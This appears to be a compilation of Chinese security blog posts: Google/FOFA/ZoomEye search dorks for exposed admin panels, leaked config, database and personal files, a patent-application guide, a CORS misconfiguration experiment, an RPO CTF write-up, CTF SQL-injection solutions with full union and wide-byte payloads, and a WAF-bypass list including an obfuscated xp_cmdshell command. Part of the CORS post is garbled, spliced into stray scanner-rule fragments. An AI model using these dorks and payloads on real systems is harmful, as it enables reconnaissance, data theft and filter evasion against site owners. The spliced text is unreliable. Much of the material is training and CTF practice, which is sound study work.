如果输入的关键字很长，在经过搜索引擎分析后，给出的搜索结果中的关键字，可能是拆分的。

对这搜索结果不满意我们可以加上双引号(“”) 和中括号( [] )就可以不被拆分
例如 “中国黑客协会” [中国黑客协会]

书名号《》
是百度独有的一个特殊查询语法。

书名号出现在搜索结果中，书名号括起来的内容不会被拆分
书名号在某些情况(如查找常用的电影或小说)下特别有效
例如 “《社交网络》”

基础操作符

逻辑与：and
逻辑或： or 、|
逻辑非： -
完整匹配：”关键词”
通配符：* ?

GoogleHacking其他语法

1、引号 ‘’ “ 把关键字打上引号后，把引号部分作为整体来搜索

2、or 同时搜索两个或更多的关键字

3、link 搜索某个网站的链接 link:baidu.com即返回所有和baidu做了链接的URL

4、info 查找指定站点的一些基本信息

GoogleHackingDatabase

google-hacking-database

GoogleHacking典型用法

管理后台地址

1
2
3

site:target.com intext:管理 | 后台 | 后台管理 | 登陆 | 登录 | 用户名 | 密码 | 系统 | 账号 | login | system
site:target.com inurl:login | inurl:admin | inurl:manage | inurl:manager | inurl:admin_login | inurl:system | inurl:backend
site:target.com intitle:管理 | 后台 | 后台管理 | 登陆 | 登录

上传类漏洞地址

1 2	site:target.com inurl:file site:target.com inurl:upload

注入页面

1	site:target.com inurl:php?id=

编辑器页面

1	site:target.com inurl:ewebeditor

1	site:target.com intitle:index.of

SQL错误

site:target.com intext:"sql syntax near" | intext:"syntax error has occurred" | intext:"incorrect syntax near" | intext:"unexpected end of SQL command" | intext:"Warning: mysql_connect()" | intext:”Warning: mysql_query()" | intext:”Warning: pg_connect()"

phpinfo()

1	site:target.com ext:php intitle:phpinfo "published by the PHP Group"

配置文件泄露

1	site:target.com ext: .xml \| .conf \| .cnf \| .reg \| .inf \| .rdp \| .cfg \| .txt \| .ora \| .ini

数据库文件泄露

1	site:target.com ext: .sql \| .dbf \| .mdb \| .db

日志文件泄露

1	site:target.com ext: .log

备份和历史文件泄露

1	site:target.com ext: .bkf \| .bkp \| .old \| .backup \| .bak \| .swp \| .rar \| .txt \| .zip \| .7z \| .sql \| .tar.gz \| .tgz \| .tar

公开文件泄露

1	site:target.com filetype: .doc \| .docx \| .xls \| .xlsx \| .ppt \| .pptx \| .odt \| .pdf \| .rtf \| .sxw \| .psw \| .csv

邮箱信息

1
2
3

site:target.com intext:@target.com
site:target.com 邮件
site:target.com email

社工信息

1	site:target.com intitle:账号 \| 密码 \| 工号 \| 学号 \| 身份证

8.2黑暗搜索

奇安信：https://hunter.qianxin.com/home/

FOFA

fofa.so
官方详细文档; https://fofa.so/help

domain="baidu.com"
domain=""||ip=""||host=""||title=""||header=""
protocol=“https”        #搜索指定协议类型
app="phpinfo"            #搜索某些组件相关系统
host="oldboyedu.com/"    #搜索包含有特定字符的URL
title=“powered by” && os==windows    #搜索网页标题中包含有特定字符并且系统是windows的网页

钟馗之眼

钟馗之眼： https://www.zoomeye.org/

语法举例：

#例1：搜索使用iis6.0主机：
app:"Microsoft-IIS" ver"6.0"
#例2：搜索使weblogic主机：
app:"weblogic httpd" port:7001
#例3：查询开放3389端口的主机：
port:3389
#例4：查询操作系统为Linux系统的服务器:
os:linux
#例5：查询公网摄像头：
service:”routersetup”
#例6：搜索美国的 Apache 服务器：
app:Apache country:US
#例7：搜索指定ip信息，
ip:121.42.173.26
#例8：查询有关taobao.com域名的信息，
site:taobao.com
#例9：搜索标题中包含该字符的网站，
title:weblogic

8.3威胁情报

微步在线：https://x.threatbook.cn/

华为安全情报： https://isecurity.huawei.com

360威胁情报中心：https://ti.360.cn/

奇安信：https://ti.qianxin.com/

VenusEye威胁情报中心：https://www.venuseye.com.cn/

作者：770

国家专利申请从入门到放弃

2019-11-06T03:39:32.000Z

今年的第二篇博客姗姗来迟，一个是实在太忙了，另一个是我实在太懒了，不过前端时间小白兔收到了一个好消息，去年5月我申请的专利终于通过了，历经了1年半，终于修成了正果。然而随着部门申请的专利陆陆续续的返回，通过率简直惨不忍睹。这篇博客记录了我从申请专利到拿到证书的全过程，分享一些经验与教训，希望对将来要申请专利的朋友提供一些帮助。

最初的准备

虚拟机（建议）

专利需要在指定的软件CPC中进行编写，导入和导出，包括后续的专利通知书查阅，回复，补正等等。令人头疼的是，CPC软件并不支持Window 10，只支持Windows XP，Win7，Win8操作系统。所以无论是Linux系统还是Mac系统都必须安装虚拟机才行。而实际上，经我亲身测试，Win7的兼容性其实也不太好，Window XP目前是最舒服的（推荐）。

CPC客户端软件

上面说了，CPC客户端软件是专门用以编辑国家专利的软件程序，包括后续专利的一系列操作。贴一下CPC客户端下载链接：CPC客户端。安装的过程并没有什么难度，按顺序执行即可。

CPC离线升级包

CPC的客户端安装软件从2012年2月发布起就再也没有更新过了，一直都是使用离线升级包的方式来维护。这是非常重要的，因为原始CPC很多配置都已经无法跟上需求，所以必须使用离线升级过后才能正常使用。贴一下最新的升级包下载链接：CPC客户端离线升级包。

其他

Microsoft Office 2003/2007/2010。
IE 7.0/8.0
不能安装Office2007/2010的兼容包以及WPS

编写专利

##发明专利请求书

这个文件用以提交本次发明的所有相关信息，包括：

发明名称
申请人
发明人（第一发明人，第二发明人， …. ）
联系人
英文信息
其他

说明书摘要

有点像论文的摘要，需要高度概括自己的发明专利的具体内容。大致写作思路可参考如下：

本发明是____，其____, 可用于____领域和____领域。本发明的技术核心是____。该技术的工作流程为____。本发发明主要针对____问题，做出了____贡献。

说明书

说明书中包含了对专利具体内容的表述，必须清晰且详细，且主要包含以下内容：

技术领域
说明发明说设计的技术领域和技术核心思路。
技术背景
解释说明本发明是在什么样的背景下提出的，是为了解决哪些问题。
附图说明
简要说明每个附图的内容。
具体实施方式
详细得说明专利的具体内容，如何部署，实施，实现（结合附图）。

5.写作须知
专利审查是十分严格的，基本不能有错别字，标点符号的错误。因此在写作结束后，一定要仔细检查语句的通顺，错别字，标点符号以及分段。如果说明书中需要插入公式，可以在外部的office中编辑好再复制进来，或直接保存成图片插入。

说明书附图

说明书中所需要的附图都保存在这里，采用的是导入的方式。如果遇到导入图片失败，请检查图片大小必须小于165mm*245mm。如果仍然报错，再次离线升级客户端尝试导入。如果还报错，可以尝试大招：在Window下用画图工具打开图片，然后另存为新图片就可以导入了，或者保存为pdf，再转回图片。

权利要求书

权利要求书是整个专利最重要的一块，也是审查员重点审核的文件，里面记载整份专利需要受保护的权利。因此权利要求书的内容必须清楚，详细，不能出现模糊，模棱两可的表达。通常而言，权利要求书的权利1高度概括需要保护的权利，然后在后面的权利要求中扩展描述：

1. 一种基于机器学习的XXXXXX方法A、XXXXB、XXXXC、XXXX2. 根据权利要求1中步骤A所述的XXXXX，其特征在于：A1、XXXXA2、XXXXA3、XXXX

受理阶段

在完成整份专利的编写后，通过CPC软件导出压缩包，然后提交自己的专利。在完成提交后，会收到一份来自国家知识产权局的 “受理通知书”，这意味的你的专利已经成功提交，并进入受理阶段。如果受理阶段没有问题，那么专利就会被送至实审，进入实审流程。

受理阶段审查的是专利的格式和标准，一般不涉及专利的具体内容。如果你的专利在受理阶段收到“补正通知书”，这说明你的提交的专利格式或标准出现问题，需要修改并提交补正文件。我曾接收到的问题如下：

说明书中附图说明不完整，需要逐一说明
说明书摘要文字部分超过300个字
权利要求书编号重复
说明书和权利要求书公式下标不清晰
说明书标题和专利名不一致
说明书中大小写不一致
…

在补正时，需要把通知书导入CPC客户端，在“通知书”里选中然后点击补正。补正材料包括补正书和修改后替代页。完成补正后，在中间文件选中然后导出，然后把补正答复提交给专利局。如果还是存在问题，则会收到第二次、第三次补正通知，这样本来就漫长的专利周期就会被拉得更长，所以在第一次补正通知时就认真修改吧。

实审阶段

专利通过受理审查后，就会送至实审，这时你会收到一份“实审通知书”，当然你也可以在soopat上查询自己的专利是否处于实审状态。

实审阶段十分漫长，往往需要1-2年才会返回结果。在实审状态中，如果收到了“第一次审查意见通知书”，说明专利内容存在问题，需要修改。目前绝大部分专利都卡死在这里，第一次审查意见会有两种情况：

目前文本暂时不能被授予专利权
不具备创新性，新颖性，没有被授予专利的实质内容，不具备授予专利的前景

如果返回的是第一种，说明很有希望通过！只要按照审查意见的内容，进行修改和提交，就很有希望拿到专利权。回复审查意见的操作和补正相似，把第一次审查意见通知书导入CPC软件，在通知书中选中进行答复，需要的材料包括：修改对照页，替换页，意见陈述书。完成修改后，在中间文件选中并导出，然后提交给专利局。
如果返回的通知书中包含第二种字眼，那么基本上就凉了，但你也可以修改，或者直接怼审查员，万一成功了，对吧？

目前我整理的关于专利实审通知的理由如下：

发明内容已经发表成论文（无论中、英）
发明内容和其他论文高度相似（在实审返回的文件中可以查看）
权利要求书内容和说明书内容矛盾
权利要求书中表述含糊，模糊，使保护范围不明确
标题不当，不能使用“技术，模型”，要用“方法，系统”
……

授权阶段

如果你的专利最终通过实审，那么就会收到来自专利局的两份通知书：授权通知书，缴费通知书。这说明的专利已经进入授权阶段，只要按时（3个月内）缴费，专利就能完成授权，寄发专利证书。

缴费可以直接网上缴费，也可以去当地代办点缴费。如果是第二种，你首先需要上网填写和打印“专利缴费信息网上补充”，然后去代办点缴费。

缴费成功后，你就可以安心等着专利证书寄过来啦（然而我至今还没等到）。

总结

血的教训，一定要先申请专利，再发论文，不然死亡率接近百分百。专利对于一个人的荣誉加成是很高的，希望大家都能申请成功，奥利给！

CORS跨域资源共享原理与漏洞

2019-03-02T03:39:32.000Z

过完年回来，我闲来无事逛了逛技术论坛，碰巧看到了对CORS漏洞的描述，顿时感兴趣起来。查了一些资料，也动手做了一些实践测试，解决了一些疑惑，这里整理成一篇博客供大家学习浏览。

一切从同源策略说起

同源策略

如果对浏览器有了解的朋友应该听过”同源策略(SOP)”。对于浏览器来说，这是一个十分重要的策略，甚至可以称得上浏览器安全的基础。

同源策略的定义为：不同域的客户端脚本在没有明确授权的情况下，不能读写对方的资源。当域名、端口和协议相同时，两个客户端才会被判断为同源。这个策略实际上完成了不同会话之间的隔离。

我们可以试想一下，如果你登录一个合法网站，然后又访问了一个恶意网站，若是没有同源策略，那么恶意网站可以随意操作合法网站上你的资源和数据。

跨域

总的来说，同源策略是一个很好的策略，能在很大程度上保证我们用户的安全。但是这已经是20年前提出的策略了，随着Web应用的不断发展，如今遇到了许多需要跨域访问资源的情况。这些场景大概如下：

前后端分离的开发
本地资源却在不同域的情况
调用关联第三方平台，如电商调用快递信息
子站调用主站资源信息

因此，即使浏览器的同源策略不变，我们依旧希望找到一些办法来实现跨域。

CORS(跨域资源共享)

简介

CORS，跨域资源共享（Cross-origin resource sharing），是H5提供的一种机制，WEB应用程序可以通过在HTTP增加字段来告诉浏览器，哪些不同来源的服务器是有权访问本站资源的，当不同域的请求发生时，就出现了跨域的现象。

简单来说，CORS是一种特例机制，可以在全局同源策略下开一个后门，允许特定的网站通过。

实验测试

为了加深对CORS机制的理解，我设置了两个服务器，服务器A是合法服务器，服务器B为恶意服务器。而为了便于读者理解，我在hosts中进行了配置：

47.xxx.xxx.xxx www.legal.com165.xxx.xxx.xxx www.malious.com

其中，域名legal为合法网站，域名malious为恶意网站。

不带Cookie的跨域访问

第一种情况是不带Cookie时对的访问，在legal中放置返回secret.php，其中返回phpinfo:

直接访问www.legal.com/secret.php会直接显示：

然后，在malious中放置恶意页面steal.html，在用户访问时恶意去请求secret.php的内容:

Hello I malious page.

上述代码的逻辑是这样的：一旦用户访问了这个页面，那么页面上的JavaScript脚本就会执行，去访问www.legal.com/secret.php的内容，并将访问的内容保存在本地。好，现在我们直接去访问恶意网站(www.malious.com/steal.html)，返回结果：

可以看到，我们的请求被拦截了，我们的JavaScript脚本并没有执行成功，本地也没有生成保存的文件。我们可以从图中清晰地看出原因：同源策略，不允许跨域请求。

但是，当我们去查看网络中的数据包时，却可以发现返回状态是200，而且是有返回内容的：

所以我们可以推测出，JavaScript是成功执行了的，请求到达legal服务器，并且成功获得了响应内容。所以拦截方是浏览器，虽然有响应内容，但同源策略将其丢弃。我们可以结合下图进行理解：

那么CORS是怎么产生的呢？当我们修改legal服务器中的配置时：

我们再次访问恶意网站(www.malious.com/steal.html)，返回结果：

可以看到，没有出现任何提示信息，因此返回的内容没有被拦截。

分析一下原因，我们在原legal服务器中配置header("Access-Control-Allow-Origin:http://www.malious.com")，这段代码等于设置了一个白名单，允许malious.com域进行跨域访问。这时，在legal服务器得到一个资源访问请求时，会进行检测，如果来源是malious.com域，那么在返回资源的响应包中会加上Access-Control-Allow-Origin:http://www.malious.com，这样浏览器将不再拦截跨域的情况：

整个跨域流程大概如下图所示：

带Cookie的跨域访问

上述的跨域是最基础的情况，但是一般而言，恶意网站进行跨域请求时为了获取一些敏感信息，比如用户的Cookie。在用户带Cookie进行跨域时，情况与不带Cookie时不太相同。

我们设置一个页面(login.php)来设置Cookie：

我们先去访问这个页面，再去访问www.legal.com/secret.php时，可以看到我们已经设置上了Cookie：

然后我们在malious服务器上放置一个保存响应信息的页面(save.php):

这样一来，如果跨域成功，那么携带用户Cookie的phpinfo信息就会保存在本地secret.html中。

但是，当我们再次访问www.malious.com/steal.html时，却发现响应包再次被拦截：

这是因为，如果用户是在携带Cookie的情况下进行跨域请求，那么浏览器将会检测是否在服务器上允许了带Cookie跨域。

因此我们在legal服务器上修改配置，允许带Cookie跨域：

完成配置后，我们再次访问时，legal服务器会自动在响应包中添加Access-Control-Allow-Credentials:true，即允许带Cookie跨域，则浏览器就不会再拦截响应包。而且从legal服务器返回的内容将会被保存到malious.com/secret.html上了：

无差别拦截

在CORS跨域时，还有一种特殊情况，当服务器的配置为：

即允许任何网站带Cookie进行跨域时，浏览器会无差别进行拦截，这也算浏览器同源策略对用户最后的保护：

漏洞

其实关于CORS的漏洞，我们已经可以在上面窃取Cookie的实验中看出一些端倪，如果允许恶意网站进行跨域请求，那么将会造成严重的信息泄露。

所以CORS漏洞的本质是服务器配置不当。

然而，现实中的CORS漏洞并不会像实验中那么直白，一般来说，网站不可能配置允许未知网站跨域。一般出现CORS漏洞的场景是这样的：

管理员在配置时需要对一批网站进行跨域授权，但一个个添加是十分麻烦的，所以管理员直接写了一个正则匹配式子来代替这些域名。问题往往出现在这里，如果正则匹配式子不够严谨或有错误，那么就会造成CORS漏洞。

举一个例子，一个管理员想要配置domain.com及其子域名可跨域，所以他配置：

这很明显是存在漏洞的正则匹配式，因为evildomain.com也满足了这个正则，所以攻击者可以去注册这个域名来发动攻击。

漏洞挖掘

关于CORS的漏洞挖掘目前两种思路，一个是白盒，这个主要是去定位相关的代码：

header("Access-Control-Allow-Origin"); header("Access-Control-Allow-Credentials");

然后分析是否存在漏洞，这种方法比较直观和简单。

如何是黑盒的话，主要还是先找网站是否存在跨域的功能，如果存在，那跨域的是哪些域名，收集信息，寻找规律，尝试构造。除了经验还需要很大程度的运气，当然如果有好的字典也可以尝试去爆破。

CSRF和CORS

在学习CORS之前，我是已经熟练掌握CSRF攻击的。现在回来看，顿时产生了异或，CSRF也是一种执行跨域的攻击，但是似乎并没有遇到同源策略的问题？

查了一下资料，理清了一下思路就明白了：我们知道CSRF一般是使用form表单来提交请求的，而浏览器是不会对form表单进行同源阻拦的，因为其是无响应的请求。知乎中解答我也是较为认同的：

所以我们发起CSRF攻击时，比如给后台添加管理员，Post数据提交后，服务器会处理请求(给后台添加管理员)，但不会返回结果给你，而实际上后台已经完成了添加管理员操作。流程可以参考：

XSS和CORS

值得一提的是，虽然同源策略禁止了跨域，但是DOM中的很多标签都可以绕过这个限制，比如)]]> (\s)*(.)*(\s)*()]]> ## 安全风险 js对资源进行引用时采用了相对路径，即有可能导致rpo攻击漏洞 ## 修复方案使用绝对路径访问资源 ]]> ]]> ]]>

测试结果

测试结果图:

其他

附上Cobra官方中文文档连接：Cobra中文文档。

RPO攻击初体验

2018-04-02T03:39:32.000Z

上周参加了CTF比赛，虽然结果一般般，但还是学到了不少东西，比如RPO攻击。RPO(Relative Path Overwrite) 攻击又称为相对路径覆盖攻击，依赖于浏览器和网络服务器的反应与服务器的 Web 缓存技术和配置差异，利用前端代码中加载的css/js的相对路径来加载其他文件，最终浏览器将服务器返回的不是css/js的文件当做css/js来解析，从而导致XSS，信息泄露等漏洞产生。这种攻击在网络上资料较少，如果不是参加比赛还真不会去了解这种攻击技术，所以这里分享给大家。

了解RPO

如果让我来解释RPO，大概就是利用css、js的相对路劲分析漏洞进行的攻击，原理：
1.在Url中使用%2f来代替/
2.Url在浏览器分析时，会把%2f解码为/，然后就正常返回页面
3.但是css/js在解析时，不会进行解码，所以就出现了目录覆盖的情况
4.产生这种漏洞的最大原因是CSS/js解析器的一个特性：浏览器在解析CSS/js样式时，会忽略非法的部分，直到找到正确的开始然后进行解析一直到结束。所以当我们植入CSS/js代码，欺骗CSS/js解析器忽略之前不合法的语法内容，从而加载我们注入的CSS/js内容。
5.一般来说，在phpinfo框架中出现这种情况的可能性比较大
（phpinfo框架：1.2.3.4:80/index.php/pp/123/,并不是有pp和123这两个目录，url在phpinfo模式下会解析成index.php?mode=pp&id=123）

详见：
RPO攻击详解1
RPO攻击详解2

比赛实例

周末CTF的比赛要求对一个系统进行审查，然后提交漏洞，管理员会进行查看。这一看就是要的钓管理员的cookie，目测就是xss。于是先开始观察系统

所以大概了解到，是通过写文章注入xss语句，然后在查看文章中确定语句可行性，然后提交钓cookie。不过发现<>标签被过滤，且没法写入script标签，但是在发现index.php页面发现js是调用的相对路径：

在查看文章发现系统是phpinfo的url解析框架：

于是决定采用RPO攻击，基本思路是通过写文章写入不含script标签的xss语句，然后通过RPO攻击将文章内容当成js来执行。经过尝试，当标题有内容时，会引入”< h >”标签，这会影响js解析，所以标题设为空，只在内容出写入xss语句：

然后构造url:

http://39.107.33.96:20000/index.php/view/article/2525/..%2f..%2f..%2f

这里解释一下，当url在服务器端执行时，会被解析为index.php/view/article/2525/../../../，也就是等价于index.php，所以返回了index.php的资源。但是在客户端进行显示时，客户端发现要执行js代码，于是向服务器端发出了资源申请，申请的url为:

http://39.107.33.96:20000/index.php/view/article/2525/..%2f..%2f..%2f/static/js/jquery.min.js

但是这里出现了一个问题，由于css/js解析器的会无视非法部分，于是..%2f..%2f..%2f/这段就被忽略了，于是url变成了：

http://39.107.33.96:20000/index.php/view/article/2525/static/js/jquery.min.js

然后该url传给服务器，很显然，在服务器端并不存在这么一个js文件，但并没有关系，由于服务器采用的phpinfo的url解析模式，于是这条url便被解析成了

http://39.107.33.96:20000/index.php?mode=view&article=2525&static=js&jquery.min.js=

于是服务器返回了index.php/view/article/2525/的内容，也就是alert（1）。这时客户端拿到资源后，将这段代码当成了js语句来执行，成功进行了RPO攻击：

找到了xss点，剩下的就简单了，提交我们精心构造的url和xss页面去调取管理员cookie，由于本章主要讲解RPO攻击，剩下的就不写了，有兴趣的小伙伴可以去继续做下去：题目点我。

其他

小白兔的团队又加入了三位小伙伴，欢迎他们的加入(～￣▽￣)～ (～￣▽￣)～ (～￣▽￣)～，希望今后一起成长，一起努力，干巴爹o(￣▽￣)ｄ。

南京邮电大学网络攻防训练平台sql注入题目专栏

2018-03-19T03:39:32.000Z

为了参加不久后的国内CTF比赛，小白兔进行了各种备战，进行了许多CTF题目的练习。后来在南邮的训练平台上做题，感觉收获颇多，尤其是在sql注入题目上。因此特地在这里记录下来，留给后来人借鉴。

题目一：MYSQL

题目地址：MYSQL

刚进题目页面就是一句提示：

于是按照提示进入/web11/robots.txt看看有什么名堂：

可以捕获几个信息：
1.可注入的文件是sql.php
2.注入的参数是id
3.基本没有防注入设置

因此这个题目不难，大概的意思是你要从id=1024的数据库记录中提出flag数据，但是程序会在id不等于1024时打印你查询出来的东西（没错这是矛盾的）。解题的关键在intval（）这个函数，这个函数的作用是把参数自动转换成整数（int）。那就很简单了，我们使id=1024.5，这样经过函数转换后$id变成1024，查到flag，然后由于id不等于1024，再打印出flag。构造语句：

http://chinalover.sinaapp.com/web11/sql.php?id=1024.5

题目二：sql injection 3

题目地址：sql injection 3

这是个很好的题目！进入题目界面：

sql查询的语句直接展示给你了，把id改成2查看一下：

当id=3的时候，查询出的也是个无关痛痒的东西，当id大于3后，就不显示了，说明数据库里只有3条记录，尝试加个单引号（’）注入试试：

我先试了一下url编码，发现无法绕过，然后突然想起当id=2时的信息：gbk_sql_injection，猜测这里存在宽字节注入漏洞，这个漏洞很有趣，可以利用编码漏洞吃掉一个反斜杠（\）: 宽字节漏洞详解。构造语句尝试宽字节注入：

http://chinalover.sinaapp.com/SQL-GBK/index.php?id=1%df' and 1=1#

发现已经注入成功了，反斜杠被吃掉了，但是有个问题，使用#注释掉尾部的单引号时时似乎被过滤了，于是用编码绕过一下，发现成功了：

OK，注入点确定后开始构造语句进行注入：

http://chinalover.sinaapp.com/SQL-GBK/index.php?id=4%df' union select 1,2%23

知道回显位置后可以用手工注入慢慢注，不过我比较懒，直接使用土耳其暴库法直接爆出数据库：

http://chinalover.sinaapp.com/SQL-GBK/index.php?id=4%df' union select 1,concat(0x5B78786F6F5D,GROUP_CONCAT(DISTINCT+table_schema),0x5B78786F6F5D)+from+information_schema.columns%23

有了数据库名，转为16进制以后继续暴处表名，构造语句:

http://chinalover.sinaapp.com/SQL-GBK/index.php?id=4%df' union select 1,concat(0x5B78786F6F5D,GROUP_CONCAT(DISTINCT+table_name),0x5B78786F6F5D)+from+information_schema.columns+where+table_schema=0x7361652d6368696e616c6f766572%23

爆出表名后，就一个个去试了，我一个个去试过了，前3个表都没什么信息，不过表ctf4就有东西，构造语句：

http://chinalover.sinaapp.com/SQL-GBK/index.php?id=4%df' union select 1,concat(0x5B78786F6F5D,GROUP_CONCAT(DISTINCT+column_name),0x5B78786F6F5D)+from+information_schema.columns+where+table_name=0x63746634%23

最后一步了，直接构造查询语句得到我们想要的flag：

http://chinalover.sinaapp.com/SQL-GBK/index.php?id=4%df' union select 1,flag from ctf4 limit 1%23

总的来说，这个题目不仅考察了手工注入的能力，还涉及到了字符编码绕过和宽字节注入漏洞，真的是个很不错的题目。

题目三：SQL注入1

题目地址：SQL注入1

进入题目界面，发现是一个登陆框，而且大方地把源码地址给你：

查看源码进行分析，发现对参数进行处理的只有trim（）函数，该函数的作用是除去字符串前后的空格（也就是毫无卵用）：

那这个题目就毫无难度了，根据语句构造万能密码绕过:

user=admin"') or 1=1 #--&pass=1

题目四：sql injection 4

提米地址：sql injection 4

进入页面发现啥也米有，于是点开页面源码发现了隐藏的信息：

这个题目坑的是，我一开始以为过滤函数有俩：htmlentities()和stripslashes(),前面那个函数的作用很复杂，具体的看：htmlentities函数详解，在这里是过滤单引号(‘)和双引号的(“)，后面的那个函数是删除反斜杠的（\）的。然后我想了半天，这三个全给过滤了咋搞啊，最后我才发现stripslashes()这个函数在if里面，根本不执行！坑死兔子了，吐着血构造语句：

http://chinalover.sinaapp.com/web15/index.php?username=\&password=or 1=1%23

这样构造是因为原来的sq查询语句就变成了：

SELECT * FROM users WHERE name='\' AND pass='or 1=1#';

由于\把’转义了，所以name等于(‘ AND pass=)，然后pass可以直接注入语句，结果如下：

题目五：SQL注入2

题目地址：SQL注入2

进入SQL注入2的界面发现跟SQL注入1的界面一毛一样，看来作者是真的懒得做页面，那肯定查看源码也能得到情报了：

既然题目提示用union，我思考了一下确实用union最简单，算是考察对union的理解了，这个关键字等于是将上表与下表连接起来，如果上表为空，那么结果直接为下表。以此为思路看这个题目，没有任何过滤，那么我们可以使上表查询为空，下表构造成一个我们已知的值，那么查询的结果就是我们构造的值：

发现失败了，检查了一下发现对参数pass进行md5转码了，重新构造语句：

user=kk' union select md5(1)#&pass=1

总结

南邮的题目还是很适合入门的，一套做下来还是收获颇多，希望这周的比赛能拿个好成绩，等比赛结束后会将南邮的两个综合题做个详细的解题过程给大家。

Git错误“fatal：could not read Username for 'https://github.com'：No error”解决方案

2018-02-27T03:40:32.000Z

年后回来，小白兔觉得不能再慵懒下去，打算立刻发了一篇博文以正视听，好不容易写完一篇绕过WAF的九种方法，按照往常的方法更新博客，结果报错：“fatal: could not read Username for ‘https://github.com‘: No error”。

问题

真的是大写的懵逼，啥也没动啊，咋过个年回来就出问题了呢，问题截图如下：

于是我折腾了很久终于找到了解决问题的方法。

解决方法

解决问题方法如下，亲测有效。
1.打开_config.yml，修改其中的deploy节点
原来的配置为：

deploy:      type: git      repo: https://github.com/{yourname}/{yourname}.github.io.git      branch: master

修改为如下：

deploy:       type: git      repo: https://{yourname}:{yourpassword}@github.com/{yourname}/{yourname}.github.io.git   branch: master

2.更新博客（素质三连）

hexo cleanhexo ghexo d

绕过WAF的9种方法

2018-02-27T03:39:32.000Z

web应用程序防火墙(或WAF)是一种过滤器、监视器，并从web应用程序阻塞HTTP流量。WAF与常规防火墙的区别在于，WAF能够过滤特定web应用程序的内容，而常规防火墙充当服务器之间的安全通道。通过检查HTTP流量，它可以防止来自web应用程序安全缺陷的攻击，例如SQL注入、跨站点脚本(XSS)、文件包含和安全性错误配置。

WAF种类

异常检测协议（Exception Detection Protocol）：拒绝不符合HTTP标准的请求
增强输入验证（Enhanced input validation）：加入代理和服务器端验证，而不仅仅是用户端验证
黑名单（Blacklist）/白名单（WhiteList）
基于规则和异常的保护机制（Rule-based and exception-based protection）：更多通过规则结合基于黑名单的机制，基于异常的更加灵活
国家管理（State management）：关注session保护，也包括Cookies技术保护，反入侵技术保护，响应监控和信息披露保护

WAF绕过方法

1.大小写混淆(Mixed Case)

将会触发WAF保护的恶意输入词修改进行大小写混淆，比如union可以变成uNIoN，如果WAF是基于黑名单的恶意词过滤，那这么做就可以绕过过滤。

http://target.com/index.php?page_id=-15 uNIoN sELecT 1,2,3,4

2.替代关键字(Replace the keyword)

在目标关键词中插入将被WAF删除的特殊字符，比如SELECT可以变成SELselectECT，一旦会被删除的字符被删除，正常字符就会被传递，这样就能绕过过滤。

http://target.com/index.php?page_id=-15 UNIunionON SELselectECT 1,2,3,4

3.编码(Encode)

+URL编码：page.php?id=1%252f%252a*/UNION%252f%252a /SELECT
+Hex编码：target.com/index.php?page_id=-15 /*!u%6eion*/ /*!se%6cect*/ 1,2,3,4
+Unicode编码：?id=10%D6‘%20AND%201=2%23

4.使用注释(Use comments)

在攻击字符串中插入注释。比如，/!SELECT/可能会被WAF忽略，但是会被传递到目标应用程序并由mysql数据库处理。

index.php?page_id=-15 /*!UNION*/ /*!SELECT*/ 1,2,3,4

5.等效函数和命令(Equivalent functions and commands)

一些函数或命令不能被使用，因为这些关键字被检测到，但在许多情况下，我们可以使用相同或类似的代码。

hex()、bin() ==> ascii()sleep() ==>benchmark()concat_ws()==>group_concat() substr((select 'password'),1,1) = 0x70　　　strcmp(left('password',1), 0x69) = 1　　  strcmp(left('password',1), 0x70) = 0　　　strcmp(left('password',1), 0x71) = -1mid()、substr() ==> substring()@@user ==> user()@@datadir ==> datadir()

6.特殊符号(Special symbols)

这里我有一些特殊符号的非字母数字字符种类，特殊符号往往具有特殊的意义和用法。

· '  符号: select 'version()';· +- 符号: select+id-1+1.from users;· @  符号: select@^1.from users;· mysql函数xxx· `、~、!、@、%、()、[]、.、-、+ 、|、%00

例子：

'se'+'lec'+'t'%S%E%L%E%C%T 11.aspx?id=1;EXEC('ma'+'ster..x'+'p_cm'+'dsh'+'ell "net user"')'or --+2=- -!!!'2id=1+(UnI)(oN)+(SeL)(EcT)

7.HTPP参数控制(HTTP parameter control)

提供多个相同名称的参数，以混淆WAF。比如http://example.com?id=1&?id = 1' or '1' = '1' --在某些情况下,例如Apache / PHP应用程序只会解析的最后的id =…，而WAF只会解析第一个。它不是一个合法的请求，但应用程序仍然接收和处理恶意输入。大多数WAF的今天都不容易受到HTTP参数污染(HPP)的影响，但是在构建绕过语句时仍然值得一试。

/?id=1;select+1,2,3+from+users+where+id=1—/?id=1;select+1&id=2,3+from+users+where+id=1—/?id=1/**/union/*&id=*/select/*&id=*/pwd/*&id=*/from/*&id=*/users

8.缓冲区溢出(Buffer overflow)

WAF的应用程序和其他应用程序一样容易受到软件缺陷的影响。如果缓冲区溢出条件可能导致崩溃，即使它不会导致代码执行，这可能导致WAF失败。换句话说，也是一种绕过。

?id=1 and (select 1)=(Select 0xA*1000)+UnIoN+SeLeCT+1,2,version(),4,5,database(),user(),8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26

9.集成（Integration）

集成意味着使用多种绕过技术，一种技术可能无法绕过过滤机制，但是使用多种技术的可能性会增加很多。

target.com/index.php?page_id=-15+and+(select 1)=(Select 0xAA[..(add about 1000 "A")..])+/*!uNIOn*/+/*!SeLECt*/+1,2,3,4…id=1/*!UnIoN*/+SeLeCT+1,2,concat(/*!table_name*/)+FrOM /*information_schema*/.tables /*!WHERE */+/*!TaBlE_ScHeMa*/+like+database()– -?id=-725+/*!UNION*/+/*!SELECT*/+1,GrOUp_COnCaT(COLUMN_NAME),3,4,5+FROM+/*!INFORMATION_SCHEM*/.COLUMNS+WHERE+TABLE_NAME=0x41646d696e--